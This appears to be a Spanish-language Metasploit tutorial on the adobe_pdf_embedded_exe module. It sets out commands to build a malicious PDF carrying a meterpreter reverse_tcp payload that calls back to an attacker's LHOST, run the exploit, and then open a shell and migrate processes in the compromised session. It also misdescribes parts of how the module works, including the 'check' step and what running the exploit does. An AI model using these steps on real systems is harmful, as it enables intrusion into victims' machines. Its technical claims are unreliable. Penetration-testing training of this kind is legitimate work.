Cómo configurar las opciones del módulo de explotación adobe_pdf_embedded_exe en Metasploit

HydraBeginner
Practicar Ahora

Introducción

Este tutorial te guiará a través del proceso de configuración del módulo de explotación adobe_pdf_embedded_exe en la herramienta de ciberseguridad Metasploit. Al final de este tutorial, tendrás una mejor comprensión de cómo aprovechar esta explotación para obtener acceso y mejorar tus habilidades en ciberseguridad.

Descripción general de Metasploit

Metasploit es un potente framework de código abierto para desarrollar, probar y ejecutar código de explotación contra sistemas de destino remotos. Ofrece un conjunto completo de herramientas y módulos que pueden utilizarse para identificar, explotar y obtener acceso a sistemas vulnerables.

El framework Metasploit es ampliamente utilizado en la comunidad de ciberseguridad para diversos propósitos, incluyendo pruebas de penetración, evaluación de vulnerabilidades y respuesta a incidentes. Está disponible para múltiples sistemas operativos, incluyendo Linux, Windows y macOS, y se puede acceder a través de una interfaz de línea de comandos (CLI) o una interfaz gráfica de usuario (GUI) conocida como Metasploit Pro.

Una de las características clave de Metasploit es su extensa biblioteca de exploits preconstruidos, que pueden utilizarse para atacar una amplia gama de vulnerabilidades de software. Estos exploits se organizan en diferentes categorías, como ejecución remota de código, escalamiento de privilegios y denegación de servicio, y pueden configurarse y ejecutarse fácilmente utilizando la consola de Metasploit.

Para utilizar Metasploit, los usuarios normalmente comienzan configurando un entorno de Metasploit en su sistema. Esto se puede hacer instalando el framework Metasploit, que está disponible para su descarga en el sitio web oficial de Metasploit. Una vez instalado, los usuarios pueden acceder a la consola de Metasploit y comenzar a explorar los diversos módulos y herramientas disponibles.

La consola de Metasploit proporciona una potente interfaz de línea de comandos para interactuar con el framework. Los usuarios pueden utilizar la consola para buscar y seleccionar exploits, configurar sus cargas útiles y opciones, y ejecutar la explotación contra un sistema de destino. La consola también proporciona una serie de otras características, como la capacidad de gestionar sesiones, recopilar información sobre los sistemas de destino y realizar actividades de post-explotación.

En general, Metasploit es una herramienta crucial para cualquier persona que trabaje en el campo de la ciberseguridad, ya que proporciona una plataforma completa y flexible para identificar, explotar y obtener acceso a sistemas vulnerables.

Configurando el Exploit adobe_pdf_embedded_exe

El módulo de explotación adobe_pdf_embedded_exe en Metasploit está diseñado para atacar una vulnerabilidad en Adobe Reader y Acrobat que permite la ejecución de código arbitrario. Esta explotación puede ser particularmente útil en escenarios donde un atacante ha obtenido acceso a un sistema de destino y necesita escalar sus privilegios o ejecutar cargas útiles adicionales.

Para configurar el módulo de explotación adobe_pdf_embedded_exe, sigue estos pasos:

Seleccionando el Módulo de Explotación

  1. Inicia la consola de Metasploit ejecutando el siguiente comando en tu terminal de Ubuntu 22.04:
    msfconsole
  2. En la consola de Metasploit, busca el módulo de explotación adobe_pdf_embedded_exe usando el siguiente comando:
    search adobe_pdf_embedded_exe
  3. Selecciona el módulo apropiado ejecutando el comando use, seguido del nombre del módulo:
    use exploit/windows/fileformat/adobe_pdf_embedded_exe

Configurando las Opciones de Explotación

Una vez que hayas seleccionado el módulo de explotación adobe_pdf_embedded_exe, puedes configurar las diversas opciones para adaptarlo a tus necesidades. Puedes ver las opciones disponibles ejecutando el comando show options:

show options

Esto mostrará una tabla con los parámetros requeridos y opcionales, junto con sus valores actuales. Puedes establecer los valores de estos parámetros usando el comando set, por ejemplo:

set FILENAME malicious.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444

En este ejemplo, estamos estableciendo la opción FILENAME a malicious.pdf, la opción PAYLOAD a windows/meterpreter/reverse_tcp, la opción LHOST a 192.168.1.10 y la opción LPORT a 4444.

Después de configurar las opciones de explotación, puedes verificar los ajustes ejecutando de nuevo el comando show options.

Validando la Configuración de la Explotación

Antes de ejecutar la explotación, es una buena práctica validar la configuración para asegurar que todas las opciones requeridas se hayan establecido correctamente. Puedes hacerlo ejecutando el comando check:

check

Si la configuración es válida, el comando check indicará que la explotación está lista para ser ejecutada.

Ahora que has configurado el módulo de explotación adobe_pdf_embedded_exe, estás listo para ejecutar la explotación y obtener acceso al sistema de destino.

Ejecutando la Explotación y Obteniendo Acceso

Una vez configurado el módulo de explotación adobe_pdf_embedded_exe, puedes ejecutar la explotación e intentar obtener acceso al sistema de destino.

Ejecutando la Explotación

Para ejecutar la explotación, simplemente ejecuta el comando exploit o run en la consola de Metasploit:

exploit

o

run

Esto iniciará la explotación e intentará ejecutar la carga útil especificada en el sistema de destino.

Obteniendo Acceso

Si la explotación tiene éxito, deberías ver en la consola de Metasploit una salida que indique que se ha establecido una sesión. Esta sesión representa una conexión con el sistema de destino, y puedes usarla para interactuar con el sistema comprometido.

Para interactuar con la sesión establecida, puedes usar el comando sessions para listar todas las sesiones activas, y luego usar el comando sessions -i <id_de_sesión> para cambiar a una sesión específica. Una vez que hayas cambiado a la sesión, puedes usar los diversos módulos y comandos de post-explotación de Metasploit para recopilar información, escalar privilegios y realizar acciones adicionales en el sistema de destino.

Por ejemplo, puedes usar el comando shell para obtener un símbolo del sistema en el sistema de destino, o el comando migrate para migrar la carga útil a un proceso diferente, lo que puede ayudar a mejorar la estabilidad y la longevidad de la sesión.

sessions -i 1
shell
migrate 1234

Al ejecutar la explotación adobe_pdf_embedded_exe y obtener acceso al sistema de destino, puedes proceder a realizar más actividades de reconocimiento, escalamiento de privilegios y movimiento lateral como parte de tus pruebas de penetración o evaluación de seguridad general.

Resumen

En este tutorial de Ciberseguridad, has aprendido a configurar las opciones del módulo de explotación adobe_pdf_embedded_exe en Metasploit. Al ejecutar la explotación y obtener acceso, has ampliado tus conocimientos y habilidades en el campo de la Ciberseguridad. Este tutorial proporciona un recurso valioso para aquellos interesados en explorar el panorama de la Ciberseguridad y aprovechar Metasploit para mejorar sus capacidades de pruebas de seguridad.